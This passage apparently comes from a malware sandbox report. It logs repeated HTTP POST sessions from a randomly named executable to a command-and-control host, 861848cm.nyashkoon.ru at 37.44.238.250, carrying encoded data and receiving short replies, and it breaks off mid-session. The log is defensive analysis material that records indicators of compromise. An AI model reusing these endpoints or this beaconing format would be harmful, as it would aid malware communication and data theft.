                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            91  192.168.2.4  50087  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:53:55.237788916 CET  333  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1252
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:55.586916924 CET  1252  OUT  Data Raw: 56 52 5a 5b 56 58 50 5b 5a 5f 52 51 54 5a 5b 5e 55 5d 59 5d 51 5f 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZ[VXP[Z_RQTZ[^U]Y]Q_RXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8/U+?0(*:?--0($X"?"W<.4.6;47"29'X$.Q-6
                                                                                            Nov 5, 2024 23:53:56.059844017 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:56.142760992 CET  308  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 06 28 14 0f 07 33 3b 37 0d 28 3d 21 13 2b 30 09 5c 38 31 37 02 29 33 28 5d 29 06 3c 52 37 01 2f 15 22 32 31 5d 21 31 3c 00 2b 2b 21 5f 05 1d 39 5a 30 17 02 50 3d 0b 3a 59 3e 51 37 18 26 0e 09 1b 3e 02 2a 5d 23 04 3a 56 32 10 2e 00 26 22 23 52 3c 24 04 06 2d 06 33 1f 26 10 2a 57 09 16 23 0f 24 0a 3f 5b 2a 31 38 06 24 10 3d 58 24 29 33 56 29 3c 09 10 23 1d 22 14 2b 23 3f 13 23 27 3a 5b 24 3a 07 1c 25 2e 02 0a 3c 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #(3;7(=!+0\817)3(])<R7/"21]!1<++!_9Z0P=:Y>Q7&>*]#:V2.&"#R<$-3&*W#$?[*18$=X$)3V)<#"+#?#':[$:%.<"&U" T0]O


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            92  192.168.2.4  50090  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:53:55.360629082 CET  333  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1012
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:55.711711884 CET  1012  OUT  Data Raw: 53 51 5f 5b 56 5f 55 5d 5a 5f 52 51 54 5a 5b 5a 55 53 59 5f 51 57 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SQ_[V_U]Z_RQTZ[ZUSY_QWR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&81<8]<$=)">.!0(7?)+-'4%29'X$.Q-
                                                                                            Nov 5, 2024 23:53:56.170129061 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:56.245335102 CET  158  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            93  192.168.2.4  50096  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:53:56.704581022 CET  309  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:57.055506945 CET  1016  OUT  Data Raw: 56 52 5f 5f 56 57 55 59 5a 5f 52 51 54 5a 5b 5e 55 51 59 57 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR__VWUYZ_RQTZ[^UQYWQUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,?&W?8>3<X**5>$(<72+Z-&0!7X%'X$.Q-6
                                                                                            Nov 5, 2024 23:53:57.521550894 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:57.600121021 CET  158  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:55 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            94  192.168.2.4  50101  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:53:57.743838072 CET  309  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:58.102458000 CET  1024  OUT  Data Raw: 56 5f 5f 59 53 5b 50 5a 5a 5f 52 51 54 58 5b 52 55 50 59 56 51 55 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V__YS[PZZ_RQTX[RUPYVQURXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]8?.T((0Y+3'=)!Z=[*]'^8 /-+.$:&,Y7=2'X$.Q-.
                                                                                            Nov 5, 2024 23:53:58.559920073 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:58.631181955 CET  158  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            95  192.168.2.4  50102  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:53:58.766155958 CET  309  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:59.118102074 CET  1024  OUT  Data Raw: 53 54 5a 54 56 5f 50 53 5a 5f 52 51 54 5c 5b 5c 55 5c 59 5a 51 55 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZTV_PSZ_RQT\[\U\YZQUR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X-?5+??#8X)9)X*>=3<_#,:(#9+!71&'X$.Q->
                                                                                            Nov 5, 2024 23:53:59.608802080 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:59.681221962 CET  158  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            96  192.168.2.4  50103  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:53:59.812558889 CET  333  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:00.164908886 CET  1024  OUT  Data Raw: 53 55 5a 5c 56 5a 55 5e 5a 5f 52 51 54 52 5b 59 55 50 59 5e 51 51 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ\VZU^Z_RQTR[YUPY^QQRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&-,2U+ X+#X))-0;< <-,:8Y#Q&&'X$.Q-
                                                                                            Nov 5, 2024 23:54:00.634643078 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:00.703541994 CET  158  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            97  192.168.2.4  50104  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:54:00.840018988 CET  333  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            98  192.168.2.4  50105  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:54:01.155915022 CET  333  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:01.508769989 CET  1264  OUT  Data Raw: 56 5f 5a 5b 53 5f 50 58 5a 5f 52 51 54 5b 5b 52 55 5d 59 5f 51 53 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_Z[S_PXZ_RQT[[RU]Y_QSRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/?&V+4+X=).>="Z$+8_ ,9(?:%,Y72'X$.Q-"
                                                                                            Nov 5, 2024 23:54:01.971863031 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:02.043348074 CET  308  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 15 3f 2a 21 07 27 3b 20 55 2a 07 39 1d 28 23 33 19 2d 32 02 59 29 0d 23 02 3e 01 3b 0a 23 2c 20 04 22 32 07 59 37 54 20 03 3f 11 21 5f 05 1d 39 12 33 39 3c 50 29 0b 31 06 3d 0e 23 18 27 20 34 09 3e 5d 32 5a 20 04 29 0c 26 58 32 03 26 22 37 16 2a 34 26 02 2e 11 02 0f 27 3a 2a 57 09 16 20 56 24 23 02 02 29 57 24 07 27 3e 1c 00 26 14 3f 56 2a 05 30 00 20 27 22 14 3e 33 38 02 23 37 3a 58 26 39 32 40 26 3d 33 51 29 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: ?*!'; U*9(#3-2Y)#>;#, "2Y7T ?!_939<P)1=#' 4>]2Z )&X2&"7*4&.':*W V$#)W$'>&?V*0 '">38#7:X&92@&=3Q)"&U" T0]O


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            99  192.168.2.4  50106  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:54:01.280555964 CET  333  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:01.633902073 CET  1024  OUT  Data Raw: 56 51 5a 59 56 5b 55 58 5a 5f 52 51 54 5b 5b 5f 55 55 59 59 51 5f 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZYV[UXZ_RQT[[_UUYYQ_R\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;<5<^7+#4)91_>-$+;"<>Q?+Y,68\ =1'X$.Q-"
                                                                                            Nov 5, 2024 23:54:02.091809034 CET  25  IN  HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:02.168530941 CET  158  IN  HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            100  192.168.2.4  50107  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:54:02.305124998 CET  309  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:02.649226904 CET | 1024 | OUT | Data Raw: 56 5f 5a 54 53 5c 50 59 5a 5f 52 51 54 5f 5b 5b 55 54 59 5b 51 50 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZTS\PYZ_RQT_[[UTY[QPRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^8,>T=8+<#;=:1)&%;4_ T+.3Z.5<\7.]&9'X$.Q-2
                                                                                            Nov 5, 2024 23:54:03.123668909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:03.201994896 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            101 | 192.168.2.4 | 50108 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:03.324435949 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:03.680490017 CET | 1016 | OUT | Data Raw: 56 54 5f 58 53 5a 50 5e 5a 5f 52 51 54 5a 5b 5c 55 5d 59 58 51 52 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VT_XSZP^Z_RQTZ[\U]YXQRR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8?1<; < \(9"?.6$87?#Y-C,]!7-%'X$.Q->
                                                                                            Nov 5, 2024 23:54:04.134897947 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:04.210491896 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            102 | 192.168.2.4 | 50109 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:04.440805912 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:04.791635990 CET | 1024 | OUT | Data Raw: 56 5e 5f 5b 56 5b 50 59 5a 5f 52 51 54 5c 5b 5d 55 50 59 5f 51 5e 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^_[V[PYZ_RQT\[]UPY_Q^RZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/!?+?#=9>>9'X ?.<>'[,6,\#4%2'X$.Q->
                                                                                            Nov 5, 2024 23:54:05.252974033 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:05.323292017 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            103 | 192.168.2.4 | 50110 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:05.452039957 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:05.805568933 CET | 1024 | OUT | Data Raw: 56 53 5a 5c 53 5d 50 5e 5a 5f 52 51 54 5c 5b 5b 55 57 59 58 51 50 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZ\S]P^Z_RQT\[[UWYXQPRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8?2U<^$+$>92*:\0##+-#]:' >^&9'X$.Q->
                                                                                            Nov 5, 2024 23:54:06.255124092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:06.329037905 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            104 | 192.168.2.4 | 50111 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:06.632776022 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
